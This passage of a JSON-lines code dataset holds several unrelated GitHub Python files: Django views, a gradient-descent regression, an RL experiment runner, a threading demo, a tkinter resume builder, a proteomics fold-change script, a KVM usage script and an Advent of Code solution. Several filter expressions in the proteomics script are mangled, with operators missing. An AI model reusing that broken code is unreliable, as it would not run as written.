)\n\n def get(self, request, *args, **kwargs):\n vp_name = self.kwargs['vp_name']\n return self._render(request, vp_name)\n\n\nclass Smartphone(View):\n template_name = 'cyberdevice/smartphone.html'\n\n def _render(self, request, do_id):\n return render(\n request,\n self.template_name,\n {\n 'ec_endpoint': settings.EC_ENDPOINT,\n 'do_id': do_id,\n }\n )\n\n def get(self, request, *args, **kwargs):\n return self._render(request, self.kwargs['do_id'])\n","repo_name":"IoTtalk/CyberApplication","sub_path":"cyberdevice/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28527644162","text":"# | Auteurs : Remi Jauzion - Oskar Morel |\n# |--------------------------------------|\n# Algorithme N°2 pour l'estimation du prix d'un appartement par rapport à ça surface Régression linéaire par descente de gradient\n\n# Calcule la dérivée partielle de a\n# x, y : tableau des valeurs\n# a, b : valeurs initiale\n# return : le resultat de la derivee de a\n\ndef lesSommes(x, y):\n sommeXAuCarre = 0\n sommeX = 0\n sommeXY = 0\n sommeY = 0\n sommeYAuCarre = 0\n for i in range(len(x)):\n sommeXAuCarre = sommeXAuCarre + (x[i] * x[i])\n sommeYAuCarre = sommeYAuCarre + (y[i] * y[i])\n sommeX = sommeX + x[i]\n sommeXY = sommeXY + (x[i] * y[i])\n sommeY = sommeY + y[i]\n return sommeX,sommeY,sommeXY,sommeXAuCarre, sommeYAuCarre\n\n\n\n\ndef derivePartielleA(a,b, sommeXAuCarre, sommeX, sommeXY):\n resultat = 2 * ((a * sommeXAuCarre) + (b * sommeX) - sommeXY)\n return resultat\n\n# Calcule la dérivée partielle de b\n# x, y : tableau des valeurs\n# a, b : valeurs initiale\n# return : le resultat de la derivee de b\ndef derivePartielleB(x,a,b,sommeX,sommeY):\n resultat = 2 * (a * sommeX + len(x) * b - sommeY)\n return resultat\n\n# Utilise les deux méthodes de calcul des dérivées partielles\n# maxIter : le nombre max d'itération avant que la boucle s'arrête (pour pas prendre trop de\n# ressource ou finir sur un cas infini\n# return : a et b calculés avec la descente de gradient\n\ndef descenteGradient(x,y,maxIter):\n\n a = 1\n b = 1\n fctCoutAvant = 0\n fctCoutApres = 0\n\n (sommeX,sommeY,sommeXY,sommeXAuCarre, sommeYAuCarre) = lesSommes(x, y)\n\n pas = 0.0001\n fini = False\n i = 0\n while not fini:\n\n if (i >= maxIter or (abs(derivePartielleB(x, a, b, sommeX, sommeY)) <= 0.0001 and abs(derivePartielleA(a, b, sommeXAuCarre, sommeX, sommeXY)) <= 0.0001)):\n fini = True\n\n fctCoutAvant = sommeYAuCarre - 2 * a * sommeXY - 2 * b * sommeY + a * a * sommeXAuCarre + 2 * a * b * sommeX + len(\n x) * b * b\n\n a -= derivePartielleA(a,b, sommeXAuCarre, sommeX, sommeXY) * pas\n b -= derivePartielleB(x,a,b,sommeX,sommeY) * pas\n\n fctCoutApres = sommeYAuCarre - 2 * a * sommeXY - 2 * b * sommeY + a * a * sommeXAuCarre + 2 * a * b * sommeX + len(\n x) * b * b\n\n # On divise le pas par 2 si la fonction cout est plus grande après le calcul du nouveau gradient que avant\n if fctCoutApres > fctCoutAvant:\n pas /= 2\n\n i+=1\n return \"a = \" + str(a) + \"\\nb = \" + str(b)\n\n\n","repo_name":"OskarMorel/Oskar_Remi_SAE_Math_S4","sub_path":"src/RegressionLineaireDescenteGradient.py","file_name":"RegressionLineaireDescenteGradient.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14000317907","text":"import os\nimport argparse\n\nimport numpy as np\nimport ruamel.yaml as yaml\nimport gym\n\nfrom PSDRL.common.data_manager import DataManager\nfrom PSDRL.common.utils import init_env, load\nfrom PSDRL.common.logger import Logger\nfrom PSDRL.agent.psdrl import PSDRL\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\n\ndef run_test_episode(env: gym.Env, agent: PSDRL, time_limit: int):\n current_observation = env.reset()\n episode_step = 0\n episode_reward = 0\n done = False\n while not done:\n action = agent.select_action(current_observation, episode_step)\n observation, reward, done, _ = env.step(action)\n episode_reward += reward\n current_observation = observation\n episode_step += 1\n done = done or episode_step == time_limit\n return episode_reward\n\n\ndef run_experiment(\n env: gym.Env,\n agent: PSDRL,\n logger: Logger,\n test_env: gym.Env,\n steps: int,\n test: int,\n test_freq: int,\n time_limit: int,\n save: bool,\n save_freq: int,\n):\n ep = 0\n experiment_step = 0\n\n while experiment_step < steps:\n episode_step = 0\n episode_reward = 0\n\n current_observation = env.reset()\n done = False\n while not done:\n\n if test and experiment_step % test_freq == 0:\n test_reward = run_test_episode(test_env, agent, time_limit)\n logger.log_episode(\n experiment_step, train_reward=np.nan, test_reward=test_reward\n )\n\n action = agent.select_action(current_observation, episode_step)\n observation, reward, done, _ = env.step(action)\n done = done or episode_step == time_limit\n agent.update(\n current_observation,\n action,\n reward,\n observation,\n done,\n ep,\n experiment_step,\n )\n\n episode_reward += reward\n current_observation = observation\n episode_step += 1\n experiment_step += 1\n \n if ep and save and experiment_step % save_freq == 0:\n logger.data_manager.save(agent, experiment_step)\n ep += 1\n logger.log_episode(\n experiment_step, train_reward=episode_reward, test_reward=np.nan\n )\n\n\n\ndef main(config: dict):\n data_manager = DataManager(config)\n logger = Logger(data_manager)\n exp_config = config[\"experiment\"]\n\n env, actions, test_env = init_env(\n exp_config[\"suite\"], exp_config[\"env\"], exp_config[\"test\"]\n )\n\n agent = PSDRL(config, actions, logger, config[\"experiment\"][\"seed\"])\n if config[\"load\"]:\n load(agent, config[\"load_dir\"])\n\n run_experiment(\n env,\n agent,\n logger,\n test_env,\n exp_config[\"steps\"],\n exp_config[\"test\"],\n exp_config[\"test_freq\"],\n exp_config[\"time_limit\"],\n config[\"save\"],\n config[\"save_freq\"],\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str, default=\"./src/config.yaml\")\n parser.add_argument(\"--env\", type=str, required=True)\n parser.add_argument(\"--seed\", type=int, default=None)\n\n args = parser.parse_args()\n\n with open(args.config, \"r\") as f:\n config = yaml.safe_load(f)\n config[\"experiment\"][\"env\"] = args.env\n config[\"experiment\"][\"seed\"] = args.seed\n\n main(config)\n","repo_name":"remosasso/PSDRL","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"29029447525","text":"#\n# 信号量对象是同步原语一种,也就是PV操作\n# 在python中,使用acquire()和release()维护一个计数器\n# 当acquire()方法小于0时,会进入阻塞状态\n\n\n# 在这里个例子中,由于启用了多线程,所以是运行Two方法其次是Two方法\n# 由于未定义先后顺序,所以在子线程进入阻塞状态后,主线程会抢先运行\n# join方法表示需要等待被调用线程完成执行\n\nimport threading\nimport time\n\n# 从线程对象创建线程\nstart = time.time()\ndef targetMethodOne():\n # for i in range(100):\n time.sleep(1)\n print(targetMethodOne.__name__)\n\n\ndef targetMethodTwo():\n # for i in range(100):\n time.sleep(0.5)\n print(targetMethodTwo.__name__)\n\nthreadTargetMethodOne = threading.Thread(target=targetMethodOne)\nthreadTargetMethodTwo = threading.Thread(target=targetMethodTwo)\n\nthreadTargetMethodOne.start()\nthreadTargetMethodTwo.start()\n\n# 在这里调用join方法,保证主线程最后执行\n# 需要注意的是,这行代码需要放在start之后,例如One方法的start和join连用,表示需等待One执行完再执行Two方法\nthreadTargetMethodOne.join()\nthreadTargetMethodTwo.join()\n\nend = time.time()\n\nprint(\"用时 {} 秒\".format(end - start))","repo_name":"luckywyy/pythonbasic_git","sub_path":"pythonbasic/python官网文档/线程/信号量对象/信号量对象.py","file_name":"信号量对象.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41559480798","text":"import tempfile\r\nimport os\r\nfrom tkinter import *\r\nimport tkinter.messagebox\r\n\r\nroot=Tk()\r\nroot.title(\"Personal Details\")\r\nroot.geometry(\"480x530+0+0\")\r\nroot.config(bg=\"light grey\")\r\n\r\nname=StringVar()\r\nemail=StringVar()\r\nmobile=StringVar()\r\naddress=StringVar()\r\ndob=StringVar()\r\ngender=StringVar()\r\nchoice=IntVar()\r\n\r\nroothead=LabelFrame(root,width=350,height=400,font=('arial',20,'bold'),text=\"Personal Details\",bg=\"light grey\")\r\nroothead.grid(row=0,column=0)\r\n\r\ndef expexit():\r\n exp.destroy()\r\n return\r\ndef expnext():\r\n global others\r\n others=Tk()\r\n others.title(\"Others\")\r\n others.geometry(\"770x675+0+0\")\r\n others.config(bg=\"light grey\")\r\n def otherprev():\r\n others.destroy()\r\n return\r\n def othernext():\r\n global final\r\n final=Tk()\r\n final.title(\"Resume\")\r\n final.geometry(\"850x850+0+0\")\r\n final.config(bg=\"light grey\")\r\n def fprint():\r\n q=res.get(\"1.0\",\"end-1c\")\r\n filename=tempfile.mktemp(\".txt\")\r\n open(filename,\"w\").write(q)\r\n os.startfile(filename,\"print\")\r\n def fexit():\r\n final.destroy()\r\n def fclear():\r\n res.delete(1.0,END)\r\n lbltit=Label(final,font=('arial',30,'bold'),text=\"Resume\",bg=\"light grey\")\r\n lbltit.pack()\r\n res=Text(final,bd=1,width=70,height=30,padx=10,pady=10,wrap=WORD,bg=\"white\",font=('arial',12,'italic'))\r\n res.pack()\r\n\r\n buttonframe=Frame(final,bd=2,width=790,height=10,padx=8,pady=10,bg=\"light grey\",relief=RIDGE)\r\n buttonframe.pack()\r\n Button(buttonframe,text=\"Exit\",font=('arial',13),pady=5,height=1,width=28,bd=2,command=fexit).grid(row=0,column=0,sticky=W)\r\n Button(buttonframe,text=\"Print\",font=('arial',13),pady=5,height=1,width=28,bd=2,command=fprint).grid(row=0,column=1,sticky=W)\r\n Button(buttonframe,text=\"Clear\",font=('arial',13),pady=5,height=1,width=28,bd=2,command=fclear).grid(row=0,column=2,sticky=W)\r\n \r\n \r\n res.insert(1.0,nametxt.get().upper()+\"\\n\")\r\n res.insert(50.0,emailtxt.get()+\"\\n\")\r\n res.insert(4.0,phone_numtxt.get()+\"\\n\")\r\n \r\n \r\n res.insert(5.0,'-----------------------------------------Career Objective------------------------------------------------------\\n')\r\n res.insert(6.0,\"\\t\"+cotext.get(1.0,END))\r\n res.insert(7.0,'---------------------------------------------------Education-------------------------------------------------------\\n')\r\n for i in range(len(lst)):\r\n for j in range(1):\r\n res.insert(8.0,\"\\t\"+lst[i][0].upper()+\"\\t|\")\r\n res.insert(8.0,\"\\n\")\r\n\r\n for i in range(len(lst)):\r\n for j in range(1):\r\n res.insert(9.0,\"\\t\"+lst[i][1].upper()+\"\\t|\")\r\n res.insert(9.0,\"\\n\")\r\n for i in range(len(lst)):\r\n for j in range(1):\r\n res.insert(10.0,\"\\t\"+lst[i][2].upper()+\"\\t|\")\r\n res.insert(10.0,\"\\n\")\r\n for i in range(len(lst)):\r\n for j in range(1):\r\n res.insert(11.0,\"\\t\"+lst[i][3].upper()+\"\\t|\")\r\n res.insert(11.0,\"\\n\")\r\n if (len(skilltext.get(1.0,END))-1)>0:\r\n res.insert(12.0,'---------------------------------------------------Skills---------------------------------------------------------------\\n')\r\n res.insert(13.0,\"\\t\"+skilltext.get(1.0,END))\r\n if (len(projecttext.get(1.0,END))-1)!=0:\r\n res.insert(30.0,'-----------------------------------------------Projects--------------------------------------------------------------\\n')\r\n res.insert(31.0,projecttext.get(1.0,END))\r\n if (len(wetext.get(1.0,END))-1)!=0:\r\n res.insert(45.0,'-----------------------------------------Work Experience------------------------------------------------------\\n')\r\n res.insert(55.0,wetext.get(1.0,END))\r\n res.insert(56.0,'---------------------------------------------------------Personal Details---------------------------------------\\n')\r\n res.insert(57.0,\"Address \\t:\\t\"+addresstxt.get()+\"\\n\")\r\n res.insert(61.0,\"Date of Birth \\t:\\t\"+dobtext.get()+\"\\n\")\r\n if (len(hobbytext.get(1.0,END))-1)!=0:\r\n res.insert(63.0,\"Hobbies \\t:\\t\"+hobbytext.get(1.0,END))\r\n if (len(achievementstext.get(1.0,END))-1)!=0:\r\n res.insert(70.0,\"Achievements\\t:\\t\"+achievementstext.get(1.0,END))\r\n if choice.get()==1:\r\n res.insert(71.0,\"Gender \\t:\\tMale\\n\")\r\n elif choice.get()==2:\r\n res.insert(71.0,\"Gender \\t:\\tFemale\\n\")\r\n if (len(languagetext.get(1.0,END))-1)!=0:\r\n res.insert(72.0,\"Languages\\t:\\t\"+languagetext.get(1.0,END))\r\n res.insert(77.0,'-----------------------------------------Declaration---------------------------------------------------------------\\n')\r\n res.insert(78.0,declarationtext.get(1.0,END))\r\n Label(others,font=('arial',18,'bold'),text=\"Others\",padx=3,pady=4,bg='light grey').grid(row=0,column=0,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Skils:\",padx=3,pady=4,bg='light grey').grid(row=1,column=0,sticky=W)\r\n skilltext=Text(others,width=50,height=4,bd=2,bg=\"white\",padx=3,pady=5,wrap=WORD,font=('arial',13,'italic'))\r\n skilltext.grid(row=1,column=1,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Achievements:\",padx=3,pady=4,bg='light grey').grid(row=2,column=0,sticky=W)\r\n achievementstext=Text(others,width=50,height=4,bd=2,bg=\"white\",padx=3,pady=5,wrap=WORD,font=('arial',13,'italic'))\r\n achievementstext.grid(row=2,column=1,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Hobby:\",padx=3,pady=4,bg='light grey').grid(row=3,column=0,sticky=W)\r\n hobbytext=Text(others,width=50,height=4,bd=2,bg=\"white\",padx=3,pady=5,wrap=WORD,font=('arial',13,'italic'))\r\n hobbytext.grid(row=3,column=1,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Languages:\",padx=3,pady=4,bg='light grey').grid(row=4,column=0,sticky=W)\r\n languagetext=Text(others,width=50,height=4,bd=2,bg=\"white\",wrap=WORD,padx=3,pady=5,font=('arial',13,'italic'))\r\n languagetext.grid(row=4,column=1,columnspan=2,sticky=W)\r\n Label(others,font=('arial',15,'italic'),text=\"Declaration:\",padx=3,pady=4,bg='light grey').grid(row=9,column=0,sticky=W)\r\n declarationtext=Text(others,width=106,height=5,bd=2,bg=\"white\",padx=3,wrap=WORD,pady=5,font=('arial',10,'italic'))\r\n declarationtext.grid(row=10,column=0,columnspan=2,sticky=W,pady=2)\r\n declarationtext.insert(1.0,\"I solemnly declare that all the information furnished in this document is free of errors to the best of my knowledge\\n\")\r\n \r\n Button(others,font=('arial',13,'italic'),text=\"Previous\",padx=3,pady=5,height=1,width=73,bd=3,command=otherprev).grid(row=11,column=0,columnspan=2,pady=2)\r\n Button(others,font=('arial',13,'italic'),text=\"Continue\",padx=3,pady=5,height=1,width=73,bd=3,command=othernext).grid(row=12,column=0,columnspan=2,pady=2)\r\n\r\n#root functions\r\ndef rootnext():\r\n if len(nametxt.get())>0 and len(emailtxt.get())>0 and len(phone_numtxt.get())>0 and len(addresstxt.get())>0 and len(dobtext.get())>0 and choice.get()>0 and (len(cotext.get(1.0,END))-1)>0:\r\n global edu\r\n global coursetxt\r\n global institutetxt\r\n global boardtxt\r\n global yoptxt\r\n global markstxt\r\n global lst\r\n\r\n\r\n edu=Tk()\r\n edu.title(\"Educational Details\")\r\n edu.geometry(\"450x350+0+0\")\r\n edu.config(bg=\"light grey\")\r\n \r\n \r\n def prev():\r\n edu.destroy()\r\n \r\n return\r\n \r\n lst=[]\r\n #edu functions\r\n def eduadd():\r\n if len(institutetxt.get())>0 and len(coursetxt.get())>0 and len(markstxt.get())>0 and len(yoptxt.get())>0:\r\n lst.append((institutetxt.get(),coursetxt.get(),markstxt.get(),yoptxt.get()))\r\n institutetxt.delete(0,END)\r\n coursetxt.delete(0,END)\r\n markstxt.delete(0,END)\r\n yoptxt.delete(0,END)\r\n \r\n else:\r\n tkinter.messagebox.showinfo(\"Warning!!!\",\"All field are mandatory\")\r\n \r\n\r\n def edunext():\r\n if len(lst)>0:\r\n global exp\r\n global projecttext\r\n global wetext\r\n exp=Tk()\r\n exp.title(\"Projct and Work Experience\")\r\n exp.geometry(\"575x415+0+0\")\r\n exp.config(bg=\"light grey\")\r\n #exphead=LabelFrame(exp,width=440,height=400,font=('arial',20,'bold'),text=\"Personal Details\",bg=\"light grey\").grid(row=0,column=0)\r\n explabel=Label(exp,font=('arial',18,'bold'),text=\"Projects and Workexperience\",padx=3,pady=4,bg='light grey').grid(row=0,column=0,sticky=E)\r\n projectlabel=Label(exp,font=('arial',15,'italic'),text=\"Projects:\",padx=3,pady=4,bg='light grey').grid(row=1,column=0,sticky=W)\r\n projecttext=Text(exp,width=77,height=5,bd=3,bg=\"white\",padx=3,pady=5,font=('arial',10,'italic'))\r\n projecttext.grid(row=2,column=0,columnspan=2,sticky=W)\r\n welabel=Label(exp,font=('arial',15,'italic'),text=\"Work Experiance:\",padx=3,pady=4,bg='light grey').grid(row=3,column=0)\r\n wetext=Text(exp,width=77,height=5,bd=3,bg=\"white\",padx=3,pady=5,font=('arial',10,'italic'))\r\n wetext.grid(row=4,column=0,columnspan=2,sticky=W)\r\n Button(exp,font=('arial',13,'italic'),text=\"Previous\",padx=3,pady=5,height=1,width=53,bd=3,command=expexit).grid(row=5,column=0,columnspan=2,pady=2)\r\n Button(exp,font=('arial',13,'italic'),text=\"Save & Continue\",padx=3,pady=5,height=1,width=53,bd=3,command=expnext).grid(row=6,column=0,columnspan=2,pady=2)\r\n else:\r\n tkinter.messagebox.showinfo(\"Warning!!!\",\"All field are mandatory\") \r\n\r\n \r\n eduhead=LabelFrame(edu,width=500,height=350,font=('arial',20,'bold'),text=\"Educatonal Qualification\",bg=\"light grey\")\r\n eduhead.grid(row=0,column=0)\r\n institutelabel=Label(eduhead,font=('arial',15,'italic'),text=\"Institute:\",padx=3,pady=4,bg='light grey').grid(row=0,column=0,sticky=W)\r\n institutetxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n institutetxt.grid(row=0,column=1,sticky=W)\r\n courselabel=Label(eduhead,font=('arial',15,'italic'),text=\"Course:\",padx=3,pady=4,bg='light grey').grid(row=1,column=0,sticky=W)\r\n coursetxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n coursetxt.grid(row=1,column=1,sticky=W)\r\n #boardlabel=Label(eduhead,font=('arial',15,'italic'),text=\"Board:\",padx=3,pady=4,bg='light grey').grid(row=2,column=0,sticky=W)\r\n #boardtxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n #boardtxt.grid(row=2,column=1,sticky=W)\r\n markslabel=Label(eduhead,font=('arial',15,'italic'),text=\"Marks Obtained:\",padx=3,pady=4,bg='light grey').grid(row=3,column=0,sticky=W)\r\n markstxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n markstxt.grid(row=3,column=1,sticky=W)\r\n yoplabel=Label(eduhead,font=('arial',15,'italic'),text=\"Year of Passing:\",padx=3,pady=4,bg='light grey').grid(row=4,column=0,sticky=W)\r\n yoptxt=Entry(eduhead,font=('arial',15,'italic'),width=25,bg='ghost white')\r\n yoptxt.grid(row=4,column=1,sticky=W)\r\n Button(eduhead,font=('arial',13,'italic'),text=\"Previous\",padx=3,pady=5,height=1,width=43,bd=1,command=prev).grid(row=5,column=0,columnspan=2)\r\n edunextbtn=Button(eduhead,text=\"Save&Continue\",font=('arial',13,\"italic\"),padx=3,pady=5,height=1,width=43,bd=1,command=edunext).grid(row=6,column=0,columnspan=2,pady=3)\r\n eduaddtbtn=Button(eduhead,text=\"add\",font=('arial',13,\"italic\"),padx=3,pady=5,height=1,width=43,bd=1,command=eduadd).grid(row=7,column=0,columnspan=2,pady=3)\r\n #Button(eduhead,text=\"sample\",command=display).grid(row=8,column=0)\r\n else:\r\n tkinter.messagebox.showinfo(\"Warning!!!\",\"All field are mandatory\")\r\n \r\ndef iexit():\r\n root.destroy()\r\n return\r\n\r\n#label and entry root\r\nnamelabel=Label(roothead,font=('arial',15,'italic'),text=\"Name:\",padx=3,pady=4,bg='light grey').grid(row=0,column=0,sticky=W)\r\nnametxt=Entry(roothead,font=('arial',15,'italic'),textvariable=name,width=25,bg='ghost white')\r\nnametxt.grid(row=0,column=1,sticky=W)\r\n\r\nemaillabel=Label(roothead,font=('arial',15,'italic'),text=\"Email:\",padx=3,pady=4,bg='light grey').grid(row=1,column=0,sticky=W)\r\nemailtxt=Entry(roothead,font=('arial',15,'italic'),textvariable=email,width=25,bg='ghost white')\r\nemailtxt.grid(row=1,column=1,sticky=W)\r\n\r\nphone_numlabel=Label(roothead,font=('arial',15,'italic'),text=\"Mobile:\",padx=3,pady=4,bg='light grey').grid(row=2,column=0,sticky=W)\r\nphone_numtxt=Entry(roothead,font=('arial',15,'italic'),textvariable=mobile,width=25,bg='ghost white')\r\nphone_numtxt.grid(row=2,column=1,sticky=W)\r\n\r\naddresslabel=Label(roothead,font=('arial',15,'italic'),text=\"Address:\",padx=3,pady=4,bg='light grey').grid(row=3,column=0,sticky=W)\r\naddresstxt=Entry(roothead,font=('arial',15,'italic'),textvariable=address,width=25,bg='ghost white')\r\naddresstxt.grid(row=3,column=1,sticky=W)\r\n\r\ndoblabel=Label(roothead,font=('arial',15,'italic'),text=\"DoB:\",padx=3,pady=4,bg='light grey').grid(row=4,column=0,sticky=W)\r\ndobtext=Entry(roothead,font=('arial',15,'italic'),textvariable=dob,width=25,bg='ghost white')\r\ndobtext.grid(row=4,column=1,sticky=W)\r\n\r\ngenderlabel=Label(roothead,font=('arial',15,'italic'),text=\"Gender:\",padx=3,pady=4,bg='light grey').grid(row=5,column=0,sticky=W)\r\ncolabel=Label(roothead,font=('arial',15,'italic'),text=\"Career Objective:\",padx=3,pady=4,bg='light grey').grid(row=6,column=0,sticky=W)\r\ncotext=Text(roothead,width=48,height=5,bd=3,bg=\"white\",wrap=WORD,padx=3,pady=5,font=('arial',13,'italic'))\r\ncotext.grid(row=7,column=0,columnspan=2,sticky=W)\r\n#radiobutton\r\ndef select():\r\n select=choice.get()\r\nmale=Radiobutton(roothead,text=\"Male\",font=('arial',10,'italic'),bg=\"light grey\",fg=\"grey\",variable=choice,value=1,command=select).grid(row=5,column=1,sticky=W)\r\nfemale=Radiobutton(roothead,text=\"Female\",font=('arial',10,'italic'),bg=\"light grey\",fg=\"grey\",variable=choice,value=2,command=select).grid(row=5,column=1,sticky=E)\r\n#button\r\nrootnextbtn=Button(roothead,text=\"Save&Continue\",font=('arial',13),pady=5,height=1,width=49,bd=2,command=rootnext).grid(row=8,column=0,sticky=W,columnspan=2,pady=2)\r\nrootexitbtn=Button(roothead,text=\"Exit\",font=('arial',13),pady=5,height=1,width=49,bd=2,command=iexit).grid(row=9,column=0,sticky=W,columnspan=2,pady=2)\r\n#rootaddtbtn=Button(roothead,text=\"add\",font=('arial',13),padx=3,pady=5,height=1,width=40,bd=1,command=add).grid(row=9,column=0,columnspan=2)\r\n","repo_name":"manjumtr/Resume-Generator","sub_path":"resume_generator.py","file_name":"resume_generator.py","file_ext":"py","file_size_in_byte":15004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8120644936","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 5 10:33:26 2023\n\n@author: liuyi\n\"\"\"\nimport pandas as pd\nimport math\n\npeptide_file_1='openms_result_ecoli_bg_ed/E4801_230403_200ng_293T_15ng_Ecoli_05xiRT_60min_DDA_R1_ecoli.csv'\npeptide_file_2='openms_result_ecoli_bg_ed/E4801_230402_200ng_293T_10ng_Ecoli_05xiRT_60min_DDA_R1_ecoli.csv'\n\n\nfile='mass_align_all_information/information_target.csv'\n\nresult_name='15_10_R1_Ecoli_deeprtalign_FC_openms_information_target_0.01_20230712.csv'\n\nsample_1='480_1_15_R1'\nsample_2='480_1_10_R1'\n\npeptide_df_1=pd.read_csv(peptide_file_1)\npeptide_df_2=pd.read_csv(peptide_file_2)\npeptide_df=pd.concat([peptide_df_1,peptide_df_2],ignore_index=True)\n\nresult={'sample_1':[],'sample_2':[],'FC':[],'peptide':[],'peptide_modi':[],'charge':[],'sample_1_mz':[],'sample_1_rt':[],'sample_1_intensity':[],'sample_2_mz':[],'sample_2_rt':[],'sample_2_intensity':[],'adj_score':[]}\n\ngroups=[]\n\ndf=pd.read_csv(file)\n\ntotal_num=len(peptide_df)\nn=0\nfor index in peptide_df.index:\n\tn=n+1\n\tprint(n,'/',total_num)\n\tsample_mz=peptide_df.loc[index]['mz']\n\tsample_rt=peptide_df.loc[index]['rt']/60\n\tsample_intensity=peptide_df.loc[index]['intensity']\n\tpeptide=peptide_df.loc[index]['peptide']\n\tpeptide_modi=peptide_df.loc[index]['peptide_modi']\n\tcharge=peptide_df.loc[index]['charge']\n\t\n\t#use 0.01 window (mz,rt,intensity) to find the same feature\n\tdf_sample=df[(df['mz']>sample_mz-0.01)&(df['mz']sample_rt-0.01)&(df_sample['time']sample_intensity-0.01)&(df_sample['intensity']0:\n\t\tfor df_sample_index in df_sample.index:\n\t\t\tgroup=df_sample.loc[df_sample_index]['group']\n\t\t\tif group in groups:\n\t\t\t\tcontinue\n\t\t\tgroups.append(group)\n\t\t\tdf_group=df[df['group']==group]\n\t\t\tif len(group)<2:\n\t\t\t\tcontinue\n\t\t\tif not (sample_1 in list(df_group['sample']) and sample_2 in list(df_group['sample'])):\n\t\t\t\tcontinue\n\t\t\tfor group_index in df_group.index:\n\t\t\t\tsample=df_group.loc[group_index]['sample']\n\t\t\t\tif sample==sample_1:\n\t\t\t\t\tsample_1_mz=df_group.loc[group_index]['mz']\n\t\t\t\t\tsample_1_rt=df_group.loc[group_index]['time']\n\t\t\t\t\tsample_1_intensity=df_group.loc[group_index]['intensity']\n\t\t\t\t\tsample_1_score=df_group.loc[group_index]['intensity']\n\t\t\t\t\tadj_score=df_group.loc[group_index]['adj_score']\n\t\t\t\tif sample==sample_2:\n\t\t\t\t\tsample_2_mz=df_group.loc[group_index]['mz']\n\t\t\t\t\tsample_2_rt=df_group.loc[group_index]['time']\n\t\t\t\t\tsample_2_intensity=df_group.loc[group_index]['intensity']\n\t\t\tFC=math.log2(sample_1_intensity)-math.log2(sample_2_intensity)\n\t\t\tresult['sample_1'].append(sample_1)\n\t\t\tresult['sample_2'].append(sample_2)\n\t\t\tresult['FC'].append(FC)\n\t\t\tresult['peptide'].append(peptide)\n\t\t\tresult['peptide_modi'].append(peptide_modi)\n\t\t\tresult['charge'].append(charge)\n\t\t\tresult['sample_1_mz'].append(sample_1_mz)\n\t\t\tresult['sample_1_rt'].append(sample_1_rt)\n\t\t\tresult['sample_1_intensity'].append(sample_1_intensity)\n\t\t\tresult['sample_2_mz'].append(sample_2_mz)\n\t\t\tresult['sample_2_rt'].append(sample_2_rt)\n\t\t\tresult['sample_2_intensity'].append(sample_2_intensity)\n\t\t\tresult['adj_score'].append(adj_score)\nresult_df=pd.DataFrame(result)\nresult_df.drop_duplicates(['sample_1_mz','sample_1_rt','sample_2_mz','sample_2_rt'],inplace=True)\nresult_df.to_csv(result_name,index=False)","repo_name":"PHOENIXcenter/deeprtalign","sub_path":"code for the experiments/02_collect_deeprtalign_FC.py","file_name":"02_collect_deeprtalign_FC.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"32754545985","text":"from server import get_arg, get_server, response\n\nserve = get_server()\n\nname = get_arg('ip[ip]')\n\ntry:\n machine = serve.lookupByName(name)\nexcept:\n response(False)\n \ntry:\n stats = machine.memoryStats()\nexcept:\n response(False)\n\n# RAM stats\nram = stats['actual']\nused_ram = ram - stats['available']\n \ndata = {'ram': ram, 'usedRam': used_ram}\n\nresponse(True, data)","repo_name":"autovmnet/kvm","sub_path":"modules/kvm/python/usage.py","file_name":"usage.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38356293356","text":"import sys\nfrom itertools import product, chain, filterfalse, count\nfrom functools import reduce\n\nlines = []\nfor line in sys.stdin:\n line = line.strip()\n coords = map(lambda x: (int(x[0]), int(x[1])), map(lambda x: x.split(\",\"), line.split(\" -> \")))\n lines.append(list(coords))\n\nmx, my = reduce(lambda m, l: (max(l[0][0], l[1][0], m[0]), max(l[0][1], l[1][1] ,m[1])), lines, (0,0))\nmap = [[0]*(my+1) for i in range(mx+1)]\n\nsign = lambda x: -1 if x < 0 else (1 if x > 0 else 0)\n\ndef find_overlap_count(part):\n for [(x1,y1), (x2,y2)] in lines:\n dir = (sign(x2-x1), sign(y2-y1))\n if part == 1 and (dir[0] !=0 and dir[1] !=0):\n continue\n x, y = x1, y1\n while True:\n map[x][y] = map[x][y] + 1\n if (x,y) == (x2,y2):\n break\n x, y = x + dir[0], y + dir[1]\n\n count = len(list(filterfalse(lambda x: x <= 1, chain.from_iterable(map))))\n print(count)\n\nfind_overlap_count(1)\nmap = [[0]*(my+1) for i in range(mx+1)]\nfind_overlap_count(2)","repo_name":"deepakjois/advent-of-code-2021","sub_path":"day5/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1791209610","text":"import cv2\nimport numpy as np\nfrom pathlib import Path\nfrom PIL import Image\nif not hasattr(Image, 'Resampling'): # Pillow<9.0\n Image.Resampling = 